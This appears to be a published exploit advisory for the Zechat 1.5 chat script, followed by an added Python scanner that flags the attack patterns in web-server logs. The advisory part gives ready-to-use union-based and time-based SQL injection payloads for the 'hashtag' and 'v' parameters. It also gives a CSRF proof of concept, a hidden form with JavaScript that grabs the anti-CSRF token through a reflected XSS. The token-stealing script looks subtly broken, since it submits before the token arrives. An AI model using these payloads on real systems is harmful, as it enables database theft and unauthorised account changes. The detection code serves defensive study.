
# Exploit Title: Zechat 1.5 - 'hashtag' / 'v' SQL Injection / Cross-Site Request Forgery
# Date: 2018-05-22
# Exploit Author: Borna Nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://bylancer.com
# Version: 1.5
# Tested on: Kali Linux
====================================================

# POC 1 : SQLi :

Parameter : hashtag
type : union-based

http://test.com/chat/hashtag?hashtag=[SQL]

# test :
http://test.com/chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23

# Payload : -1' UNION SELECT NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_schema=schema()%23

====================================================

Parameter : v
type : time-based blind

test.com/chat/me?action=edit&v=[SQL]

# test : test.com/chat/me?action=edit&v=231 AND sleep(10)%23

# Payload : AND sleep(10)%23
====================================================

# POC 2 : CSRF :

# CSRF vulnerability allows attacker to change user's information.
The script has anti-CSRF protection, so a user's information cannot be changed
without the token. The 'hashtag' parameter is vulnerable to reflected XSS, so the
encoded payload is delivered through it to bypass the CSRF protection:
chat/hashtag?hashtag=[We have Reflected XSS here]

# Exploit :

<form action="http://test.com/chat/data_settings.php" method="POST">
<input type="hidden" name="csrf_token" value="" />
<input type="hidden" name="Wall" value="Hello would you like to be my friend" />
<input type="hidden" name="user" value="lord225" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="mail" value="d3code.n@gmail.com" />
<input type="hidden" name="website" value="test" />
<input type="hidden" name="sex" value="male" />
<input type="hidden" name="country" value="------" />
<input type="hidden" name="day" value="" />
<input type="hidden" name="month" value="" />
<input type="hidden" name="year" value="" />
<input type="hidden" name="Language" value="en" />
</form>

<script>
var token = '';
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
    if(this.readyState == 4 && this.status == 200){
        var setPage = this.responseXML;
        token = setPage.forms[1].elements[0].value; // get token
        console.log(token);
    }
}
req.open("POST","/chat/settings",true);
req.setRequestHeader("content-type","application/x-www-form-urlencoded");
req.responseType = "document";
req.send();

document.forms[0].elements[0].value = token; // set token to our form
document.forms[0].submit();
</script>

====================================================
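Added detection example (not part of the original advisory, and not Zechat's own code): a Python scanner that runs over constructed web-server log lines and flags requests to the two endpoints above whose 'hashtag' or 'v' parameter carries the union-based or time-based payload shapes from POC 1, or the reflected-XSS markup that POC 2 relies on to read the CSRF token. The endpoint paths and parameter names come from the advisory; the log format, the pattern list and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Endpoint -> parameter the advisory reports as injectable / reflected (from the PoCs).
WATCHED = {"/chat/hashtag": "hashtag", "/chat/me": "v"}

# Payload shapes from the PoCs, matched after URL decoding, case-insensitively.
PATTERNS = {
    "union-based": re.compile(r"union\s+(all\s+)?select\b", re.I),
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "schema-enum": re.compile(r"information_schema\.", re.I),
    "reflected-xss": re.compile(r"<\s*/?\s*script\b|\bon[a-z]+\s*=|javascript:", re.I),
}

# Apache/nginx combined log format (assumed): method, request target, status.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def inspect_line(line):
    """Return (path, param, [matched pattern names]) for a suspicious line, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    param = WATCHED.get(parts.path)
    if param is None:
        return None
    # parse_qs decodes once; decode again so a double-encoded payload is still seen.
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    hits = []
    for value in values:
        decoded = unquote_plus(value)
        hits += [n for n, rx in PATTERNS.items() if rx.search(decoded) and n not in hits]
    return (parts.path, param, hits) if hits else None

def scan(lines):
    """Run inspect_line over an iterable of log lines and keep only the findings."""
    return [hit for hit in map(inspect_line, lines) if hit]

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '203.0.113.5 - - [22/May/2018:10:01:02 +0000] "GET /chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [22/May/2018:10:01:09 +0000] "GET /chat/me?action=edit&v=231%20AND%20sleep(10)%23 HTTP/1.1" 200 88',
    '203.0.113.5 - - [22/May/2018:10:01:40 +0000] "GET /chat/hashtag?hashtag=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3300',
    '198.51.100.7 - - [22/May/2018:10:02:00 +0000] "GET /chat/hashtag?hashtag=python HTTP/1.1" 200 3210',
    '198.51.100.7 - - [22/May/2018:10:02:30 +0000] "GET /chat/me?action=edit&v=231 HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for path, param, hits in scan(SAMPLE_LOG):
        print(f"{path} param={param} matched={','.join(hits)}")
```

A request whose parameter only appears benign (the last two sample lines) produces no finding, and a 404 or 500 on these paths is still reported because the status is not part of the decision.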